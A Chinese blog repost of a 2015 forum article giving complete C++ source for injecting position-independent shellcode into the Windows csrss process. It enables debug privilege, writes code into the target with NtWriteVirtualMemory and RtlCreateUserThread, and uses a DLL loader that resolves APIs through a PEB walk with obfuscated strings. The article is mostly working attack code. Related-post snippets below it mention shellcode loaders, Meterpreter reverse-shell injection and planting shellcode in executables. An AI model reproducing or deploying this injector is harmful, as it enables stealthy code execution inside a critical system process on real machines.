纯C++编写Win32/X64通用Shellcode注入csrss进程

最新推荐文章于 2024-09-24 07:55:44 发布
最新推荐文章于 2024-09-24 07:55:44 发布
阅读量2.9k 收藏 5
点赞数 1
文章标签: c语言 win32
标 题: 【原创】纯C++编写Win32/X64通用Shellcode注入csrss进程.
作 者: 猪会被杀掉
时 间: 2015-08-08,04:26:13
链 接: http://bbs.pediy.com/showthread.php?t=203140


这是做的一些研究,觉得没什么用处,人生不应该把精力放在这些小打小闹的垃圾玩意身上;先讲一下文章的主题这样做的目的,这样做免去了用汇编代码限制,纯C++编写的东西移植性高.


注入csrss进程要点:只能用导入表之存在ntdll的dll进行注入,否则会失败.其他要点基本上没什么了,csrss进程pid使用CsrGetProcessId函数获取,免去了遍历进程的痛苦.


看下我们的注入器(这是Win32/x64通用的).
代码:
#include "main.h"
#include "base/component_name.h"


namespace bootldr{
  static HANDLE WINAPI ShellcodeBegin(PTHREAD_DATA parameter){
    if (parameter->fnRtlInitUnicodeString != nullptr&&parameter->fnLdrLoadDll != nullptr){
      UNICODE_STRING UnicodeString;
      parameter->fnRtlInitUnicodeString(&UnicodeString, parameter->dllpath);
      HANDLE module_handle = nullptr;
      return (HANDLE)parameter->fnLdrLoadDll(nullptr, nullptr, &UnicodeString, &module_handle);
    }
    else{
      return (HANDLE)-3;
    }
  }
  static DWORD WINAPI ShellcodeEnd(){
    return 0;
  }
  static bool SetProcessPrivilege(DWORD SE_DEBUG_PRIVILEGE = 0x14){
    BOOLEAN bl;
    RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &bl);
    return bl;
  }
  static bool ProcessInternalExecute(PTHREAD_DATA parameter,DWORD process_id){
    HANDLE hProcess = nullptr;
    CLIENT_ID cid = { (HANDLE)process_id, nullptr };
    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
    if (!NT_SUCCESS(NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, &cid))){
      return false;
    }
    PVOID data = VirtualAllocEx(hProcess, NULL, 0x2000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    PVOID code = VirtualAllocEx(hProcess, NULL, 0x2000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!data || !code){
      NtClose(hProcess);
      return false;
    }
    NtWriteVirtualMemory(hProcess, data, parameter, sizeof(THREAD_DATA), NULL);
    NtWriteVirtualMemory(hProcess, code, (PVOID)ShellcodeBegin, (ULONG)((LPBYTE)ShellcodeEnd - (LPBYTE)ShellcodeBegin), NULL);
    HANDLE hThread = nullptr;
    if (!NT_SUCCESS(RtlCreateUserThread(hProcess, NULL, FALSE, 0, 0, 0, code, data, &hThread, NULL))){
      NtClose(hProcess);
      return false;
    }
    NtWaitForSingleObject(hThread, FALSE, NULL);
    DWORD exit_code = -1;
    GetExitCodeThread(hThread, &exit_code);
    NtClose(hThread);
    VirtualFreeEx(hProcess, data, 0, MEM_RELEASE);
    VirtualFreeEx(hProcess, code, 0, MEM_RELEASE);
    NtClose(hProcess);
    return (exit_code==0);
  }
  std::wstring GetAbsolutePath(const std::wstring& name){
    wchar_t fileName[MAX_PATH] = {0};
    GetModuleFileNameW(NULL, fileName, MAX_PATH);
    PathRemoveFileSpec(fileName);
    return std::wstring(fileName).append(name);
  }
  void SetShellcodeLdrModulePath(PTHREAD_DATA parameter,const std::wstring& srcfile){
    wcscpy_s(parameter->dllpath, srcfile.c_str());
  }
}


int WINAPI wWinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPWSTR lpCmdLine,int nShowCmd){
  THREAD_DATA parameter = {0};
  parameter.fnRtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlInitUnicodeString");
  parameter.fnLdrLoadDll = (pLdrLoadDll)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrLoadDll");
  parameter.fnGetTempPathW = (pGetTempPathW)GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetTempPathW");
  parameter.fnGetSystemDirectoryW = (pGetSystemDirectoryW)GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetSystemDirectoryW");
  parameter.fnGetVolumeInformationW = (pGetVolumeInformationW)GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetVolumeInformationW");
  bootldr::SetProcessPrivilege();
  bootldr::SetShellcodeLdrModulePath(&parameter, bootldr::GetAbsolutePath(base::kBootldrName));
  bootldr::ProcessInternalExecute(&parameter, GetCurrentProcessId()/*CsrGetProcessId()*/);
    return 0;
}
这里再看一下我们的shellcode式的加载器,该动态库加载一个第三方dll,没有导入任何函数,全部函数通过动态获取(如果你不知道怎么动态获取,请先去研究PEB链表).


代码:
namespace Function{
  HANDLE GetKernel32Handle(){
    HANDLE hKernel32 = INVALID_HANDLE_VALUE;
#ifdef _WIN64
    PPEB lpPeb = (PPEB)__readgsqword(0x60);
#else
    PPEB lpPeb = (PPEB)__readfsdword(0x30);
#endif
    PLIST_ENTRY pListHead = &lpPeb->Ldr->InMemoryOrderModuleList;
    PLIST_ENTRY pListEntry = pListHead->Flink;
    WCHAR strDllName[MAX_PATH];
    WCHAR strKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', L'\0' };


    while (pListEntry != pListHead){
      PLDR_DATA_TABLE_ENTRY pModEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
      if (pModEntry->FullDllName.Length){
        DWORD dwLen = pModEntry->FullDllName.Length;
        __MEMCPY__(strDllName, pModEntry->FullDllName.Buffer, dwLen);
        strDllName[dwLen / sizeof(WCHAR)] = L'\0';
        if (__STRSTRIW__(strDllName, strKernel32)){
          hKernel32 = pModEntry->DllBase;
          break;
        }
      }
      pListEntry = pListEntry->Flink;
    }
    return hKernel32;
  }


  BOOL Initialize(){
    HANDLE hKernel32 = GetKernel32Handle();
    if (hKernel32 == INVALID_HANDLE_VALUE){
      return FALSE;
    }
    LPBYTE lpBaseAddr = (LPBYTE)hKernel32;
    PIMAGE_DOS_HEADER lpDosHdr = (PIMAGE_DOS_HEADER)lpBaseAddr;
    PIMAGE_NT_HEADERS pNtHdrs = (PIMAGE_NT_HEADERS)(lpBaseAddr + lpDosHdr->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY pExportDir = (PIMAGE_EXPORT_DIRECTORY)(lpBaseAddr + pNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);


    LPDWORD pNameArray = (LPDWORD)(lpBaseAddr + pExportDir->AddressOfNames);
    LPDWORD pAddrArray = (LPDWORD)(lpBaseAddr + pExportDir->AddressOfFunctions);
    LPWORD pOrdArray = (LPWORD)(lpBaseAddr + pExportDir->AddressOfNameOrdinals);
    CHAR strLoadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'W', 0x0 };
    CHAR strGetProcAddress[] = { 'G', 'e', 't', 'P', 'r', 'o', 'c', 'A', 'd', 'd', 'r', 'e', 's', 's', 0x0 };


    for (UINT i = 0; i < pExportDir->NumberOfNames; i++){
      LPSTR pFuncName = (LPSTR)(lpBaseAddr + pNameArray[i]);
      if (!__STRCMPI__(pFuncName, strGetProcAddress)){
        GetProcAddressAPI = (FARPROC(WINAPI*)(HMODULE, LPCSTR))(lpBaseAddr + pAddrArray[pOrdArray[i]]);
      }
      else if (!__STRCMPI__(pFuncName, strLoadLibraryA)){
        LoadLibraryWAPI = (HMODULE(WINAPI*)(LPCWSTR))(lpBaseAddr + pAddrArray[pOrdArray[i]]);
      }
      if (GetProcAddressAPI != nullptr && LoadLibraryWAPI != nullptr){
        return TRUE;
      }
    }
    return FALSE;
  }
  FARPROC GetAddress(const char* function_name){
#ifdef OS_WIN_64
    PPEB lpPeb = (PPEB)__readgsqword(0x60);
#else
    PPEB lpPeb = (PPEB)__readfsdword(0x30);
#endif
    PLIST_ENTRY pListHead = &lpPeb->Ldr->InMemoryOrderModuleList;
    PLIST_ENTRY pListEntry = pListHead->Flink;
    while (pListEntry != pListHead){
      PLDR_DATA_TABLE_ENTRY pModEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
      if (pModEntry->FullDllName.Length){
        FARPROC address = GetProcAddressAPI(LoadLibraryWAPI(pModEntry->FullDllName.Buffer), function_name);
        if (address){
          return address;
        }
      }
      pListEntry = pListEntry->Flink;
    }
    return nullptr;
  }
  bool ImportDll(){
    using OLE_INITIALIZE = HRESULT(WINAPI*)(LPVOID);
    wchar_t dll_ole32[] = { L'O', L'l', L'e', L'3', L'2', L'.', L'd', L'l', L'l', 0 };
    char dll_ole32_api[] = { 'O', 'l', 'e', 'I', 'n', 'i', 't', 'i', 'a', 'l', 'i', 'z', 'e', 0 };
    OLE_INITIALIZE ole_initialize = reinterpret_cast<OLE_INITIALIZE>(GetProcAddressAPI(LoadLibraryWAPI(dll_ole32), dll_ole32_api));
    using INIT_COMMON_CONTROLS_EX = void (WINAPI*)(const void*);
    wchar_t dll_comctl32[] = { L'C', L'o', L'm', L'c', L't', L'l', L'3', L'2', L'.', L'd', L'l', L'l', 0 };
    char dll_comctl32_api[] = { 'I', 'n', 'i', 't', 'C', 'o', 'm', 'm', 'o', 'n', 'C', 'o', 'n', 't', 'r', 'o', 'l', 's', 'E', 'x', 0 };
    INIT_COMMON_CONTROLS_EX init_common_controls_ex = reinterpret_cast<INIT_COMMON_CONTROLS_EX>(GetProcAddressAPI(LoadLibraryWAPI(dll_comctl32), dll_comctl32_api));
    if (ole_initialize == nullptr || init_common_controls_ex == nullptr){
      return false;
    }
    init_common_controls_ex(nullptr);
    return (ole_initialize(nullptr) == S_OK);
  }
  HMODULE LoadPluginEngine(HMODULE hModule, const wchar_t* name){
    DWORD(WINAPI* GetModuleFileNameWAPI)(HMODULE, LPWSTR, DWORD);
    GetModuleFileNameWAPI = (DWORD(WINAPI*)(HMODULE, LPWSTR, DWORD))Function::GetAddress("GetModuleFileNameW");
    HRESULT(STDAPICALLTYPE* PathRemoveFileSpecWPI)(LPWSTR);
    PathRemoveFileSpecWPI = (HRESULT(STDAPICALLTYPE*)(LPWSTR))Function::GetAddress("PathRemoveFileSpecW");
    if (GetModuleFileNameWAPI!=nullptr&&PathRemoveFileSpecWPI != nullptr){
      wchar_t fileName[MAX_PATH];
      GetModuleFileNameWAPI(hModule, fileName, MAX_PATH);
      PathRemoveFileSpecWPI(fileName);
      __STRCATW__(fileName, (LPWSTR)name);
      return LoadLibraryWAPI(fileName);
    }
    return nullptr;
  }
}
BOOL WINAPI DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){
  static HMODULE ldr = nullptr;
  if(ul_reason_for_call==DLL_PROCESS_ATTACH){
    Function::Initialize();
    Function::ImportDll();
    if (DisableThreadLibraryCallsAPI == nullptr){
      DisableThreadLibraryCallsAPI = (BOOL(WINAPI*)(HMODULE))Function::GetAddress("DisableThreadLibraryCalls");
      DisableThreadLibraryCallsAPI(hModule);
    }
    if (RtlAdjustPrivilege==nullptr){
      BOOLEAN enabled_privilege = 0;
      const DWORD SE_DEBUG_PRIVILEGE = 0x14;
      RtlAdjustPrivilege = (ULONG(NTAPI*)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN))Function::GetAddress("RtlAdjustPrivilege");
      RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &enabled_privilege);
    }
    ldr = Function::LoadPluginEngine(hModule, base::kPluginLdrName);
    return (ldr != nullptr);
  }
  if (ul_reason_for_call == DLL_PROCESS_DETACH){
    if (FreeLibraryAPI == nullptr){
      FreeLibraryAPI = (BOOL(WINAPI*)(HMODULE))Function::GetAddress("FreeLibrary");
      return (FreeLibraryAPI(ldr));
    }
  }
  return FALSE;
}

总结,这些东西真的基本上没啥用处,也不用掖着藏着了,整个工程请下载附件.


http://bbs.pediy.com/showthread.php?t=203140&highlight=csrss

chaos444
关注
X32进程注入x64DLLx64进程
墨鱼菜鸡
09-09 588
在x32程序中获得x64函数地址是找到这个项目,之后根据自己的理解稍微改了改代码,测试之后能够正常的注入,代码如下 #include "stdafx.h" #include "x32Injectx64.h" #include <Windows.h> #include "wow64ext.h" #pragma comment(lib,"wo...
编写shellcode注入进程
挖树
10-18 4773
shellcode 维基百科: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。 被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcode。 …… Shellcode通常是以机器码形式编写的。 去掉修饰词,shellcode就是一段机器码。 关于shellcode如何...
csrss.exe通过远程DLL注入
09-17
C++源代码,DLL工程的主文件注入的代码和注入后执行的代码在一起。
注入CSRSS 亲测有效 不蓝屏
05-06
注入CSRSS 亲测有效 不蓝屏 `````````````````````````````````````````
Shhhloader:一款强大的Shellcode加载器
最新发布
gitblog_01050的博客
09-24 725
Shhhloader:一款强大的Shellcode加载器 Shhhloader Syscall Shellcode Loader (Work in Progress) 项目地址: https://gitcode.com/gh_mi...
使用C编译器编写shellcode
Tody Guo的专栏
12-08 1589
原文出处: Nick Harbour   译文出处: IDF徐文博 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代码仅能靠它自己,作者无法使用现代软件开发的实践来推
win7,win10注入CSRSS 不蓝屏
04-22
winXp,win7 32 , win7 64 ,win10注入CSRSS蓝屏 这是一个重要的进程,他会随系统的启动而自动开启并一直运行。在大多数情况下它是安全的,你不应该将其终止;但也有与其类似的病毒出现
C/C++ 进程无模块内存注入[x86/x64]
05-30
Windows R3 无模块注入,x86+x64通用,不支持异常处理,编译前关闭GS安全检查,VS2015所写,并无明显C++特征,兼容性极高
E语言注入csrss无视读写
11-01
注入CSRSS 亲测有效 不蓝屏
bddisasm是一种快速,轻量级的x86 / x64指令解码器。-C/C++开发
05-26
该项目还具有一个快速的,基本的x86 / x64指令仿真器,专门设计用于检测类似shellcode的行为。 Bitdefender反汇编程序Bitdefender反汇编程序(bddisasm)是一种轻量的,仅x86 / x64的指令解码器。 它易于集成,易于...
64位Windows 10 shellcode,可使用Meterpreter反向shell注入所有进程。-.NET开发
05-27
Windows / x64-使用Meterpreter反向Shell注入所有进程(655字节)Windows / x64-使用Meterpreter反向Shell注入所有进程(655字节)Shellcode作者:Bobby Cooke(boku)日期:2021年5月1日经过测试:Windows 10 v2004...
C++ > (开源) Ring3下的DLL注入工具 x64(NtCreateThreadEx + LdrLoadDll方式实现,可以注入系统进程)
04-28
DLL注入工具有很多,但是也有很多无法注入系统进程如explorer.exe,notepad.exe等,特别是Win7以上平台。此注入工具核心注入部分使用NtCreateThreadEx + LdrLoadDlll方式实现,特色在于比一般的远程线程注入稳定,可以注入系统进程,服务进程等。 工具介绍:http://blog.csdn.net/sunflover454/article/details/50441014 开源介绍:http://blog.csdn.net/sunflover4
将shllcode注入Linux中正在运行的进程(C/C++代码实现)
chen1415886044的博客
07-30 1056
进程注入是一种在单独的活动进程的地址空间中执行任意代码的方法。在另一个进程的上下文中运行代码可以允许访问该进程的内存、系统/网络资源,以及可能提升的权限。通过进程注入执行也可能逃避安全产品的检测,因为在合法进程下执行是被掩盖的。 有许多不同的方法可以将代码注入进程,其中许多方法滥用合法功能。这些实现适用于每个主要的操作系统,但通常是特定于平台的。 更复杂的样本可以利用命名管道或其他进程间通信(IPC)机制作为通信信道来执行对分段模块的多个进程注入,并进一步逃避检测。
C/C++ 实现ShellCode编写与提取
CSDN
07-16 9930
简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。使用 Release 模式写代码,这是因为 Debug 模式下的代码在转换成汇编后首先都是一个 jmp,然后再跳到我们的功能代码处,但 jmp 指令是 “地址相关” 的 ,所以在转换成 shellcode 时就会出错!简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。这就是我们需要的 ShellCode 了 (o゚v゚)ノ。
C语言游戏外挂:C++简单 DLL 注入超级玛丽!
03-18 3139
通过C语言编写一个DLL文件和一个EXE文件,其中DLL包含作弊功能,运行EXE后将DLL注入游戏,使得游戏仅靠自身进程便可以实现作弊功能。 下面是小编整理好的一套C/C++资料,加小编C/C++编程学习群:825414254,获取系统性学习C/C++的学习资料 对象分析 要用的API函数简单介绍 编写测试效果 总体评价 对象分析 注:本次游戏对象为Super Mario XP 没有更新所以...
C++ 龙马谷代码注入器 支持x86/x64汇编 DLL注入
hgfor的专栏
04-02 559
如果您有好的建议或发现BUG,可以到论坛提交,我们会不断完善。龙马谷代码注入器 Ver 1.3 支持x86/x64汇编。
c++shellcode加载器
qq_44657899的博客
05-26 3700
文章目录VirtualAlloc申请内存堆 VirtualAlloc申请内存 #include <windows.h> #include <iostream> #include <time.h> #pragma comment (lib, "winmm.lib") #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") void startShellCode() { unsi
【2021.01.15】注入ShellCode
oalken的博客
01-15 737
什么是ShellCode? 不依赖环境,在任何地方都能执行的机器码(硬编码)。 ShellCode编写原则 不能有全局变量。 不能使用常量字符串、 不能使用系统调用。 不能嵌套调用其他函数。 ShellCode的问题 由于第 3 点,所以不能直接使用函数,因为直接使用函数在编译时会产生导入表。而将代码复制到其他进程中,其他进程没有需要的导入表,所以会出问题。 那么该怎么解决这个问题呢? 可以不依赖任何导入表得到进程的TEB,其次,通过TEB找到PEB,再找到 3 个链表。 对链表进行遍
C/C++ 搜索缝隙并插入ShellCode
CSDN
02-22 7475
ShellCode放入变量中,然后修改插入可执行文件名称,运行后即可将shellCode插入到EXE中,并设置好装载地址,程序运行后会先上线,然后在执行原始的代码,在使用metaspoit生成shellcode时,运行方式需要指定为线程运行,如果为进程运行,则会卡在ShellCode的循环代码中,原始程序则无法弹出,也就起不到插入的目的了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值